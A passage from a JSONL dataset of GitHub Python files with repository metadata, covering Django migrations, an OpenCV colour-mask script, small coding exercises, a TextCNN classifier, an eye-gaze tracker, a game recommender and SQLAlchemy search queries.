Response(sr.data)\n\n\n\n\n\n","repo_name":"pavankalevaru/DjangoProjects","sub_path":"restfremwork/Apl/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42704517473","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('fttb_list', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='fttb_area',\n options={'verbose_name_plural': '1. FTTB \\u5340\\u57df\\u7bc4\\u570d'},\n ),\n migrations.AlterModelOptions(\n name='fttb_iplist',\n options={'verbose_name_plural': '2. FTTB IP \\u5217\\u8868'},\n ),\n migrations.AlterField(\n model_name='fttb_iplist',\n name='phone_2',\n field=models.CharField(default=b'', max_length=18, verbose_name='\\u806f\\u7d61\\u96fb\\u8a712', blank=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='historicalfttb_iplist',\n name='phone_2',\n field=models.CharField(default=b'', max_length=18, verbose_name='\\u806f\\u7d61\\u96fb\\u8a712', blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"sufuf3/ipmanage","sub_path":"fttb_list/migrations/0002_auto_20150728_1559.py","file_name":"0002_auto_20150728_1559.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3123128637","text":"'''今日鸽子'''\nimport time\nfrom main import getgroupstorage, memberlist, getname, headshot, getran\n\n\ndef run(_:str):\n date = time.strftime('%y-%m-%d')\n data = getgroupstorage()\n if data.get('jrgz_date')!=date:\n data['jrgz_date'] = date\n member = getran(memberlist())\n data['jrgz'] = member['user_id']\n return f'今日鸽子(1/1)\\n{getname(data[\"jrgz\"])}\\n{headshot(data[\"jrgz\"])}\\n恭喜这位鸽子,今天你可以光明正大的咕咕咕啦!'\n","repo_name":"sch246/yz_bot","sub_path":"_code/bot/cmds/jrgz.py","file_name":"jrgz.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25813641632","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as pl\r\n\r\n\r\ncap = cv2.VideoCapture('images2/video_climb.MOV')\r\n# Создаем цикл, перебираем картинки\r\ncf = 0\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n # В success передаем T или F в зависимости, удалось ли прочитать текущее изображение в видео\r\n\r\n # Уменьшаем шум на фото, но сохраняем контуры\r\n img = cv2.bilateralFilter(img, 30, 35, 45)\r\n\r\n img_HSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\n low_hsv = (130, 20, 20)\r\n up_hsv = (174, 255, 255)\r\n\r\n hsv_mask = cv2.inRange(img_HSV, low_hsv, up_hsv)\r\n\r\n cv2.imshow('Mask', hsv_mask)\r\n cv2.imshow('Image', img)\r\n\r\n # Позволяет проигрывать кадры с нужной скоростью и при необходимости\r\n # выйти из видео с помощью клавиши q\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n\r\n\"\"\"\r\n# Copy the thresholded image.\r\nim_floodfill = hsv_mask.copy()\r\n\r\n# Mask used to flood filling.\r\n# Notice the size needs to be 2 pixels than the image.\r\nh, w = hsv_mask.shape[:2]\r\nmask = np.zeros((h + 2, w + 2), np.uint8)\r\n\r\n# Floodfill from point (0, 0)\r\ncv2.floodFill(im_floodfill, mask, (0, 0), 255)\r\n\r\n# Invert floodfilled image\r\nim_floodfill_inv = cv2.bitwise_not(im_floodfill)\r\n\r\n# Combine the two images to get the foreground.\r\nim_out = hsv_mask | im_floodfill_inv\r\n\r\n# Display images.\r\ncv2.imshow(\"Thresholded Image\", hsv_mask)\r\ncv2.imshow(\"Floodfilled Image\", im_floodfill)\r\ncv2.imshow(\"Inverted Floodfilled Image\", im_floodfill_inv)\r\ncv2.imshow(\"Финальный без дырок\", im_out)\r\ncv2.waitKey(0)\r\n\"\"\"\r\n\r\n# cv2.imshow('Window', violet_hsv_mask)\r\n# cv2.waitKey()\r\n","repo_name":"yalokk/climber-s-movements-vision","sub_path":"3.1 Поиск на видео объектов определенного цвета в HSV.py","file_name":"3.1 Поиск на видео объектов определенного цвета в HSV.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18766457705","text":"cedulas = [100,50,20,10,5,2,1]\n\nnumber = int(input())\n\nprint(str(number))\n\naux = number\n\nfor i in range(len(cedulas)):\n\n qtd = int(aux / cedulas[i])\n aux = aux % cedulas[i]\n\n print(f\"{qtd} nota(s) de R$ {cedulas[i]},00\")","repo_name":"thi-martinsj/Programming-Exercises","sub_path":"beecrowd/begginer/1018_banknotes.py","file_name":"1018_banknotes.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9656422941","text":"class Solution:\n def romanToInt(self, s: str) -> int:\n mapping = {\n 'I' : 1,\n 'V' : 5,\n 'X' : 10,\n 'L' : 50,\n 'C' : 100,\n 'D' : 500,\n 'M' : 1000\n }\n exceptionEnd = set(['V', 'X', 'L', 'C', 'D', 'M'])\n exceptionStart = {\n 'I' : {'V': 4, 'X': 9}, \n 'X' : {'L': 40, 'C': 90}, \n 'C' : {'D': 400, 'M': 900}, \n }\n total = 0\n seenException = False\n seenExceptionChar = ''\n for char in s: \n if seenException and char in exceptionEnd:\n total += exceptionStart[seenExceptionChar][char]\n seenException = False\n total -= mapping[seenExceptionChar]\n elif char in exceptionStart: \n seenException = True\n seenExceptionChar = char\n total += mapping[char]\n else:\n total += mapping[char]\n return total\n\n# Runtime: 71 ms, faster than 45.21% of Python3 online submissions for Roman to Integer.\n# Memory Usage: 14 MB, less than 72.57% of Python3 online submissions for Roman to Integer.","repo_name":"cphung3/leetcode-solutions","sub_path":"13. Roman to Integer.py","file_name":"13. Roman to Integer.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33805545546","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import layers\nimport process\nimport pandas as pd\n\nlens = 23\n\n\ndef text_cnn_model(cls = 15):\n k = 100 # word embedding\n n = lens # length of a sentence\n inputs = tf.keras.Input(shape=(n, k, 1), name='input_data')\n\n pool_outputs = []\n for filter_size in [4, 5, 6, 7]:\n conv = layers.Conv2D(kernel_size=(filter_size, k), filters=32, activation='relu')(inputs)\n conv = layers.Dropout(0.3)(conv)\n pool = layers.MaxPool2D(pool_size=(n - filter_size + 1, 1))(conv)\n pool_outputs.append(pool)\n\n pool_outputs = layers.concatenate(pool_outputs, axis=-1, name='concatenate')\n pool_outputs = layers.Flatten(data_format='channels_last', name='flatten')(pool_outputs)\n\n outputs = layers.Dense(64, activation='relu')(pool_outputs)\n outputs = layers.Dropout(0.6)(outputs)\n outputs = layers.Dense(cls)(outputs)\n\n model = tf.keras.Model(inputs=inputs, outputs=outputs)\n return model\n\n\ndef main():\n path = './embedding_models/tencent-ailab-embedding-zh-d100-v0.2.0-s/tencent-ailab-embedding-zh-d100-v0.2.0-s.txt'\n\n train_data = pd.read_csv('./data/train.csv')\n dev_data = pd.read_csv('./data/dev.csv')\n\n print(\" == loading word embedding\")\n vectors, size, dim = process.load_embeddings(path)\n vectors['OOV'] = np.random.rand(dim)\n vectors['PAD'] = np.zeros(dim)\n\n print(\"== sentence embedding ==\")\n\n sentences = train_data['sentence'].values.tolist()\n sentences_embedded = [process.vectorize(sentence=sentence, length=lens, padding='PAD', oov='OOV', vectors=vectors)\n for sentence in sentences]\n\n sentences_embedded = np.array(sentences_embedded)\n sentences_embedded = sentences_embedded.reshape(len(train_data), lens, dim, 1)\n\n labels = train_data['label'].values.tolist()\n label_set = set(labels)\n label_map = {}\n for i, key in enumerate(label_set):\n label_map[key] = i\n labels_mapped = np.array([label_map[label] for label in labels])\n \n # load dev data\n dev_sentences = dev_data['sentence'].values.tolist()\n dev_sentences_embedded = [process.vectorize(sentence=sentence, length=lens, padding='PAD', oov='OOV', vectors=vectors)\n for sentence in dev_sentences]\n\n dev_sentences_embedded = np.array(dev_sentences_embedded)\n dev_sentences_embedded = dev_sentences_embedded.reshape(len(dev_data), lens, dim, 1)\n\n dev_labels = dev_data['label'].values.tolist()\n dev_labels_mapped = np.array([label_map[label] for label in dev_labels])\n \n\n model = text_cnn_model()\n model.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n\n print(\"== begin training ==\")\n model.fit(sentences_embedded, labels_mapped,\n validation_data=(dev_sentences_embedded, dev_labels_mapped),\n epochs=30,\n batch_size=256)\n\n print(\"== save model\")\n model.save_weights(\"text_checkpoint\")\n\n #model = text_cnn_model()\n #model.load_weights(\"text_checkpoint\")\n #print(model.summary())\n\n\nif __name__ == '__main__':\n gpus = tf.config.list_physical_devices('GPU')\n if len(gpus)>1:\n tf.config.set_visible_devices(gpus[1], 'GPU')\n print('use gpu1')\n main()\n\n\n","repo_name":"microsoft/atp-edu","sub_path":"Course102/Demos/dl_text_classification/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"26367771027","text":"TYPE_RESIDENTIAL = \"Residential\"\nTYPE_COMMERCIAL = \"Commercial\"\nTYPE_RESIDENTIAL_MULTI = \"Multi-Family\"\n\nSUBTYPE_CONDO = \"Condo\"\nSUBTYPE_LAND = \"Land\"\nSUBTYPE_HOUSE = \"House\"\nSUBTYPE_HOUSE_MULTIFAMILY = \"House-Multi-Family\"\nSUBTYPE_CONDO_MULTIFAMILY = \"Condo-Multi-Family\"\nSUBTYPE_MULTIFAMILY = \"Multi-Family\"\nSUBTYPE_OTHER = \"Other\"\nSUBTYPE_OFFICE = \"Office\"\nSUBTYPE_INDUSTRIAL = \"Industrial\"\nSUBTYPE_RETAIL = \"Retail\"\n\nTYPE_SUBTYPE_MAP = {\n TYPE_RESIDENTIAL: [\n SUBTYPE_HOUSE, SUBTYPE_CONDO,\n SUBTYPE_HOUSE_MULTIFAMILY,\n SUBTYPE_CONDO_MULTIFAMILY\n ],\n TYPE_COMMERCIAL: [\n SUBTYPE_MULTIFAMILY, SUBTYPE_OFFICE, SUBTYPE_LAND,\n SUBTYPE_RETAIL, SUBTYPE_INDUSTRIAL, SUBTYPE_OTHER\n ]\n}\n\nTYPE_CHOICES = [\n (TYPE_RESIDENTIAL, \"Residential\"),\n (TYPE_COMMERCIAL, \"Commercial\")\n]\n\nTYPE_PRICES_MAP = {\n TYPE_RESIDENTIAL: 1000, # in cents\n TYPE_COMMERCIAL: 2000, # in cents\n SUBTYPE_HOUSE_MULTIFAMILY: 2000, # in cents\n SUBTYPE_CONDO_MULTIFAMILY: 2000\n}\n\nSUBTYPE_CHOICES = [\n (SUBTYPE_CONDO, \"Condo\"),\n (SUBTYPE_LAND, \"Land\"),\n (SUBTYPE_HOUSE, \"House\"),\n (SUBTYPE_MULTIFAMILY, \"Multi-Family\"),\n (SUBTYPE_OTHER, \"Other\"),\n (SUBTYPE_OFFICE, \"Office\"),\n (SUBTYPE_INDUSTRIAL, \"Industrial\"),\n (SUBTYPE_RETAIL, \"Retail\"),\n (SUBTYPE_HOUSE_MULTIFAMILY, \"House-Multi-Family\"),\n (SUBTYPE_CONDO_MULTIFAMILY, \"Condo-Multi-Family\")\n]\n\nSTATUS_PENDING = \"pending\"\nSTATUS_UPLOADING = \"uploading\"\nSTATUS_INACTIVE = \"inactive\"\nSTATUS_ACTIVE = \"active\"\nSTATUS_SOLD = \"sold\"\nSTATUS_DELETED = \"deleted\"\n\nSTATUS_CHOICES = [\n (STATUS_PENDING, \"Pending\"),\n (STATUS_INACTIVE, \"Inactive\"),\n (STATUS_ACTIVE, \"Active\"),\n (STATUS_SOLD, \"Sold\"),\n (STATUS_DELETED, \"Deleted\"),\n]\n\nTRANSLATION_TRANSLATED = \"translated\"\nTRANSLATION_OUTDATED = \"outdated\"\nTRANSLATION_SCHEDULED = \"scheduled\"\nTRANSLATION_PROCESSING = \"processing\"\nTRANSLATION_CHOICES = (\n (TRANSLATION_TRANSLATED, \"Translated\"),\n (TRANSLATION_OUTDATED, \"Outdated\"),\n (TRANSLATION_SCHEDULED, \"Scheduled\"),\n (TRANSLATION_PROCESSING, \"Processing\"),\n)\n\n# Translations\nRENT = 'rent'\nTR_FOR_SALE_IN = 'forSaleIn'\nTR_FOR_RENT_IN = 'forRentIn'\nTR_WITH_DASHES = {\n \"multi-family\": \"multiFamily\",\n \"condo-multi-family\": \"condoMultiFamily\",\n \"house-multi-family\": \"houseMultiFamily\",\n}\nTR_DEFAULT_DESCRIPTION = 'defaultDescription'\n\nFILE_STATUS_UPLOADED = 'uploaded'\nFILE_STATUS_ERROR = 'error'\n\nPROPERTIES_FILE_STATUSES = (\n (STATUS_PENDING, 'pending'),\n (STATUS_UPLOADING, 'uploading'),\n (FILE_STATUS_UPLOADED, 'uploaded'),\n (FILE_STATUS_ERROR, 'error')\n)\n\n# Countries lists for advanced search\nMULTI_COUNTRY_NAMES = {\n 'United States': ['USA', 'United States', 'US', 'America'],\n 'Canada': ['Canada'],\n 'United Kingdom': [\n 'United Kingdom', 'UK', 'England', 'Britain', 'Great Britain'\n ],\n 'UAE': ['UAE', 'United Arab Emirates'],\n 'Ireland': ['Ireland'],\n 'New Zealand': ['New Zealand'],\n 'Norway': ['Norwegian', 'Norway'],\n 'Philippines': ['Philippines'],\n 'Israel': ['Israel', 'State of Israel'],\n 'Sweden': ['Sweden'],\n 'Switzerland': ['Switzerland'],\n 'Germany': ['Germany'],\n 'Spain': ['Spain'],\n 'Portugal': ['Portugal'],\n 'Italy': ['Italy'],\n 'Russia': ['Russia'],\n 'Greece': ['Greece'],\n 'Denmark': ['Denmark'],\n 'Finland': ['Finland'],\n 'Ukraine': ['Ukraine'],\n 'Mexico': ['Mexico'],\n 'Saudi Arabia': ['Saudi Arabia'],\n 'Netherlands': ['Netherlands'],\n 'Luxembourg': ['Luxembourg'],\n 'China': ['China'],\n 'South Africa': ['South Africa'],\n 'Singapore': ['Singapore'],\n 'Belgium': ['Belgium'],\n 'India': ['India'],\n 'Macau': ['Macau', 'Macao'],\n 'Qatar': ['Qatar'],\n 'Taiwan': ['Taiwan'],\n 'Bahrain': ['Bahrain'],\n 'Australia': ['Australia'],\n 'Fiji': ['Fiji'],\n 'France': ['France'],\n}\n","repo_name":"mykolademyanov/portfolio","sub_path":"properties/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2299437097","text":"import argparse\nimport os\n\nimport cv2\nimport face_alignment\nimport numpy as np\nfrom src.EyeGaze import GazeModel\nfrom tqdm import tqdm\n\n\ndef parse_args(args):\n parser = argparse.ArgumentParser(description=\"Choose config: \")\n parser.add_argument(\"--eye_gaze_backbone\", type=str, default=\"mobile_net\")\n parser.add_argument(\n \"--eye_gaze_model_weights\",\n type=str,\n default=\"eye_gaze_tracker/weights/mobile_net_small100_00067.pth\",\n )\n parser.add_argument(\n \"--input_path\", type=str, default=\"eye_gaze_tracker/test/images/\"\n )\n parser.add_argument(\n \"--output_path\", type=str, default=\"eye_gaze_tracker/test/results/\"\n )\n parser.add_argument(\"--device\", type=str, default=\"cpu\")\n return parser.parse_args(args)\n\n\ndef find_gaze(img, gaze_model, landmark, eye_points):\n x_left = int(landmark[eye_points[0]][0])\n x_right = int(landmark[eye_points[3]][0])\n y_top = int(landmark[eye_points[1]][1])\n y_bot = int(landmark[eye_points[5]][1])\n\n x_pad = (x_right - x_left) // 2\n y_pad = (y_top - y_bot) // 2\n\n x_left -= x_pad\n x_right += x_pad\n y_top += y_pad\n y_bot -= y_pad\n\n img = img[y_top:y_bot, x_left:x_right]\n\n if img.size > 0:\n pred = gaze_model.predict(img)\n return pred\n else:\n return [None, None]\n\n\ndef main(args=None):\n print(\"Loading models...\")\n args = parse_args(args)\n for k in vars(args):\n print(f\"{k} : {getattr(args, k)}\")\n\n os.mkdir(args.output_path)\n\n fa = face_alignment.FaceAlignment(\n face_alignment.LandmarksType.TWO_D,\n flip_input=False,\n device=args.device,\n )\n gaze_model = GazeModel(\n args.eye_gaze_backbone, args.eye_gaze_model_weights, args.device\n )\n\n print(\"Processing data...\")\n\n for imname in tqdm(os.listdir(args.input_path)):\n img = cv2.imread(f\"{args.input_path}/{imname}\")\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.resize(img, (256, 256))\n\n landmark = fa.get_landmarks(img)[0]\n\n left_eye_points = [36, 37, 38, 39, 40, 41]\n right_eye_points = [42, 43, 44, 45, 46, 47]\n\n left_gaze = find_gaze(img, gaze_model, landmark, left_eye_points)\n right_gaze = find_gaze(img, gaze_model, landmark, right_eye_points)\n\n gaze = (left_gaze + right_gaze) / 2\n\n left_eye_center = np.mean(landmark[left_eye_points], axis=0)\n right_eye_center = np.mean(landmark[right_eye_points], axis=0)\n\n cv2.arrowedLine(\n img,\n left_eye_center.astype(np.int32),\n (left_eye_center + gaze * 50).astype(np.int32),\n [0, 0, 255],\n 2,\n )\n\n cv2.arrowedLine(\n img,\n right_eye_center.astype(np.int32),\n (right_eye_center + gaze * 50).astype(np.int32),\n [0, 0, 255],\n 2,\n )\n\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n cv2.imwrite(f\"{args.output_path}/{imname}\", img)\n print(f\"Result saved to {args.output_path}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SokolovArtiom/eye_gaze_tracker","sub_path":"eye_gaze_tracker/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11894637442","text":"# content-based recommender system\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\nfrom itertools import chain, repeat\n\nchainer = chain.from_iterable\n\n\n# ---------------------- START functions ----------------------\n# Function that takes in movie title as input and outputs most similar movies\n# def get_recommendations(prod, cosine_sim):\n\n# # Get the pairwise similarity scores of games\n# sim_scores = list(enumerate(cosine_sim[prod]))\n\n# # Sort games based on the similarity scores\n# sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\n# # Get the scores of the 10 most similar games\n# sim_scores = sim_scores[1:11]\n\n# # Get the game indices\n# movie_indices = [i[0] for i in sim_scores]\n\n# # Return the top 10 most similar movies\n# return games_data.iloc[movie_indices]\n\n\ndef create_pivot_table(pd_df):\n data = pd_df.values\n rows, row_pos = np.unique(data[:, 4], return_inverse=True) # col 4: internal user id\n cols, col_pos = np.unique(data[:, 1], return_inverse=True) # col 1: real product id\n pivot_matrix = np.zeros((len(rows), len(cols)), dtype=data.dtype)\n pivot_matrix[:] = np.nan\n pivot_matrix[row_pos, col_pos] = data[:, 2]\n return pivot_matrix\n\n\ndef recommend_movies(pred_df, userID, games, original_ratings, num_recommendations):\n # get internal id of user\n uid_internal = map_uid.at[userID, 'index']\n\n sorted_user_predictions = pred_df.iloc[uid_internal].sort_values(ascending=False)\n\n # get user's rated games\n user_data = original_ratings[original_ratings.user_id == int(userID)]\n\n # optional: merge game info\n # user_full = (user_data.merge(games, how='left', left_on='product_id', right_on='product_id').\n # sort_values(['rating'], ascending=False)\n # )\n\n # Recommend the highest predicted rating games that the user hasn't seen yet.\n recommendations = games_data[~games_data['product_id'].isin(user_data['product_id'])].merge(\n pd.DataFrame(sorted_user_predictions).rename_axis('product_id').reset_index(), how='left',\n on='product_id').rename(columns={uid_internal: 'pred'}).sort_values('pred', ascending=False).iloc[\n :num_recommendations, :]\n\n return recommendations\n\n\n# ---------------------- END functions ----------------------\n\ndata = pd.read_csv(\"/Users/danielkhan/Google Drive/Web Mining Project/Dataset/filter_for_algorithms.csv\",\n usecols=['product_id', 'user_id', 'title_x', 'publisher', 'genres', 'tags', 'specs', 'bin'])\ndata['product_id'] = data['product_id'].astype(int) # product_id is initially a float with .0s\nprint(\"Total users: \" + str(data['user_id'].nunique()))\nprint(\"Total products: \" + str(data['product_id'].nunique()))\n\n# dataframe storing games info\ngames_data = data[['product_id', 'title_x', 'publisher', 'genres']].copy()\ngames_data.fillna(\"\", inplace=True)\ngames_data.drop_duplicates(inplace=True)\ngames_data.set_index(pd.Series(np.arange(len(games_data))), inplace=True)\ngames_data['metadata'] = games_data[['publisher', 'genres']].apply(lambda x: ' '.join(x), axis=1)\n\n# produce tfidf matrix\ntfidf = TfidfVectorizer(stop_words='english')\ntfidf_matrix = tfidf.fit_transform(games_data['metadata'])\ntfidf_df = pd.DataFrame(tfidf_matrix.toarray(), index=games_data.index.tolist())\n\n# compute cosine similarity\ncosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n\n# recommendations = get_recommendations(1, cosine_sim)\n# print(recommendations)\n\n# create internal product id\nmap_pid = games_data.reset_index()\nmap_pid = map_pid[['index', 'product_id']].copy()\n\n# create internal user id\nmap_uid = data[['user_id']].copy().drop_duplicates(keep='first')\nmap_uid.set_index(pd.Series(np.arange(len(map_uid))), inplace=True)\nmap_uid.reset_index(inplace=True)\nmap_uid.set_index('user_id', inplace=True)\n\nuser_item = data[['user_id', 'product_id', 'bin']].copy()\nuser_item = user_item.merge(map_pid, on='product_id', how='left')\nuser_item = user_item.merge(map_uid, on='user_id', how='left')\n\n# user_item_matrix = user_item[['user_id','index','bin']].pivot(index='user_id', columns='index', values = 'bin').fillna(0)\nuser_item_matrix2 = create_pivot_table(user_item)\n\n# pred = user_item_matrix2.dot(cosine_sim) / np.array([np.abs(cosine_sim).sum(axis=1)])\n\nmean_item_rating = np.nanmean(user_item_matrix2, axis=0)\nratings_diff = (user_item_matrix2 - mean_item_rating[np.newaxis, :])\n\narray = np.zeros((len(map_uid), len(map_pid)))\nindex = 0\nfor r1 in ratings_diff:\n if index %1000 == 0:\n print(index)\n sum_rated = np.nansum(np.where(np.isnan(r1), r1, cosine_sim), axis=1)\n dp = np.where(np.isnan(r1), 0.0, r1).dot(np.where(np.isnan(cosine_sim), 0.0, cosine_sim))\n dp = (np.nan_to_num(r1)).dot(cosine_sim)\n prod = np.nan_to_num(dp / sum_rated)\n array[index] = prod\n index = index + 1\n\npred = mean_item_rating[np.newaxis, :] + array\n\n# pred = mean_item_rating[np.newaxis, :] + ratings_diff.dot(cosine_sim) / np.array([np.abs(cosine_sim).sum(axis=1)])\n# print(pred)\ncontent_prediction = pred.clip(min=0)\n\ncontent_pred_df = pd.DataFrame(content_prediction, columns=list(map_pid['product_id']))\n\n# dict in the format {uid: [prod1, prod2, ..., prodN]}, stores all user's recommendations\nresults = []\n\n# iterate over all users\nfor index, user in enumerate(data['user_id'].unique().tolist()):\n if index % 1000 == 0:\n print(index)\n recommendations = recommend_movies(content_pred_df, user, games_data, user_item, 10)\n prod_rating = [(user, i, j) for i, j in\n zip(recommendations['product_id'].tolist(), recommendations['pred'].tolist())]\n results.extend(prod_rating)\n\n# df_results = pd.DataFrame({'user_id': list(chainer(repeat(k, len(v)) for k, v in results.items())), 'product_ratings': list(chainer(results.values()))})\ndf_results = pd.DataFrame(results, columns=['user_id', 'product_id', 'rating'])\n# df_results['product_ratings'].str[1:-1].str.split(',', expand=True).astype(float)\n\n# output results\ndf_results.to_csv(\"cb5000.csv\", index=False)\n\nprint(df_results.head(100))\n\n# test recommendations for one user\nrecommendations = recommend_movies(content_pred_df, 76561198022842797, games_data, user_item, 10)\nprint(recommendations)\n","repo_name":"ejakupi13/Uni-Projects","sub_path":"Content_Based_Recommendation.py","file_name":"Content_Based_Recommendation.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3136150927","text":"\"\"\" Class for advanced SQL queries without DB changes \"\"\"\nimport pandas as pd\nfrom sqlalchemy import text, bindparam, String, Integer, Numeric\nfrom application.models import User, Recipe, Like, Consent\nimport datetime\n\n\nclass Sql_queries:\n def __init__(self, session):\n \"\"\"\n Make DB connection via session object available to all queries\n session: (Flask-)SQLAlchemy session object\n \"\"\"\n self.session = session\n\n def fuzzy_search(self, search_term, search_column=\"url\", N=160):\n \"\"\"\n DESCRIPTION:\n Searches in recipes table column url for strings that include the\n search_term. If none do, returns the top N results ordered\n by edit distance in ascending order.\n INPUT:\n search_term (str): String to look for in search_column\n search_column (str): Column to search (default=\"url\")\n N (int): Max number of results to return\n OUTPUT:\n results (list of RowProxy objects): query results\n \"\"\"\n # Most similar urls by edit distance that actually contain the\n # search_term\n query = text(\n \"\"\"\n SELECT \"recipesID\", \"title\", \"url\", \"perc_rating\",\n \"perc_sustainability\", \"review_count\", \"image_url\",\n \"emissions\", \"prop_ingredients\",\n LEVENSHTEIN(\"url\", :search_term) AS \"rank\"\n FROM public.recipes\n WHERE \"url\" LIKE :search_term_like\n ORDER BY \"rank\" ASC\n LIMIT :N\n \"\"\",\n bindparams=[\n bindparam(\"search_term\", value=search_term, type_=String),\n bindparam(\n \"search_term_like\", value=\"%\" + search_term + \"%\", type_=String\n ),\n bindparam(\"N\", value=N, type_=Integer),\n ],\n )\n results = self.session.execute(query).fetchall()\n\n # If no results contain the search_term\n if not results:\n query = text(\n \"\"\"\n SELECT \"recipesID\", \"title\", \"url\", \"perc_rating\",\n \"perc_sustainability\", \"review_count\", \"image_url\",\n \"emissions\", \"prop_ingredients\",\n LEVENSHTEIN(\"url\", :search_term) AS \"rank\"\n FROM public.recipes\n ORDER BY \"rank\" ASC\n LIMIT :N\n \"\"\",\n bindparams=[\n bindparam(\"search_term\", value=search_term, type_=String),\n bindparam(\"N\", value=N, type_=Integer),\n ],\n )\n results = self.session.execute(query).fetchall()\n return results\n\n def phrase_search(self, search_term, N=160):\n \"\"\"\n DESCRIPTION:\n Searches in table recipes in combined_tsv column using tsquery\n - a tsvector column in DB table recipes combining title and\n categories.\n INPUT:\n search_term (str): Search term\n N (int): Max number of results to return\n OUTPUT:\n results (list of RowProxy objects): DB query result\n \"\"\"\n query = text(\n \"\"\"\n SELECT \"recipesID\", \"title\", \"url\", \"perc_rating\",\n \"perc_sustainability\", \"review_count\", \"image_url\",\n \"emissions\", \"prop_ingredients\",\n ts_rank_cd(combined_tsv, query) AS rank\n FROM public.recipes,\n websearch_to_tsquery('simple', :search_term) query\n WHERE query @@ combined_tsv\n ORDER BY rank DESC\n LIMIT :N\n \"\"\",\n bindparams=[\n bindparam(\"search_term\", value=search_term, type_=String),\n bindparam(\"N\", value=N, type_=Integer),\n ],\n )\n results = self.session.execute(query).fetchall()\n return results\n\n def free_search(self, search_term, N=160):\n \"\"\"\n DESCRIPTION:\n Parent function for searching recipes freely. At the moment\n it only calls phrase_search. But having this function makes\n it easier to extend in the future.\n INPUT:\n search_term (str)\n N (int): Max number of results to return\n OUTPUT:\n results (list of RowProxy objects): DB query result\n NOTES:\n See https://www.postgresql.org/docs/12/textsearch-controls.html\n for details on postgres' search functionalities.\n \"\"\"\n results = self.phrase_search(search_term, N=N)\n if not results:\n results = self.fuzzy_search(search_term, N=N - len(results))\n return results\n\n def query_content_similarity_ids(self, search_term):\n \"\"\"\n DESCRIPTION:\n Searches in connected postgres DB for a search_term in\n 'url' column and returns recipeIDs of similar recipes based\n on content similarity.\n INPUT:\n search_term (str): Search term\n OUTPUT:\n CS_ids (tuple): Content based similarity ID vector ordered by\n similarity in descending order\n \"\"\"\n query = text(\n \"\"\"\n SELECT * FROM public.content_similarity200_ids\n WHERE \"recipeID\" = (\n SELECT \"recipesID\" FROM public.recipes\n WHERE \"url\" = :search_term)\n \"\"\",\n bindparams=[bindparam(\"search_term\", value=search_term, type_=String)],\n )\n CS_ids = self.session.execute(query).fetchall()[0][1::]\n CS_ids = tuple([abs(int(CSid)) for CSid in CS_ids])\n return CS_ids\n\n def query_content_similarity(self, search_term):\n \"\"\"\n DESCRIPTION:\n Searches in connected postgres DB for a search_term in\n 'url' and returns content based similarity.\n INPUT:\n search_term (str): Search term\n OUTPUT:\n CS (tuple): Content based similarity vector ordered by\n similarity in descending order\n \"\"\"\n query = text(\n \"\"\"\n SELECT * FROM public.content_similarity200\n WHERE \"recipeID\" = (\n SELECT \"recipesID\" FROM public.recipes\n WHERE url = :search_term)\n \"\"\",\n bindparams=[bindparam(\"search_term\", value=search_term, type_=String)],\n )\n CS = self.session.execute(query).fetchall()[0][1::]\n CS = tuple([abs(float(s)) for s in CS])\n return CS\n\n def query_similar_recipes(self, CS_ids):\n \"\"\"\n DESCRIPTION:\n fetch recipe information of similar recipes based on the recipe IDs\n given by CS_ids\n INPUT:\n CS_ids (tuple): Tuple of recipe IDs\n OUTPUT:\n recipes_sql (list of RowProxy objects): DB query result\n \"\"\"\n query = text(\n \"\"\"\n SELECT \"recipesID\", \"title\", \"ingredients\",\n \"rating\", \"calories\", \"sodium\", \"fat\",\n \"protein\", \"emissions\", \"prop_ingredients\",\n \"emissions_log10\", \"url\", \"servings\", \"recipe_rawid\",\n \"image_url\", \"perc_rating\", \"perc_sustainability\",\n \"review_count\"\n FROM public.recipes\n WHERE \"recipesID\" IN :CS_ids\n \"\"\",\n bindparams=[bindparam(\"CS_ids\", value=CS_ids, 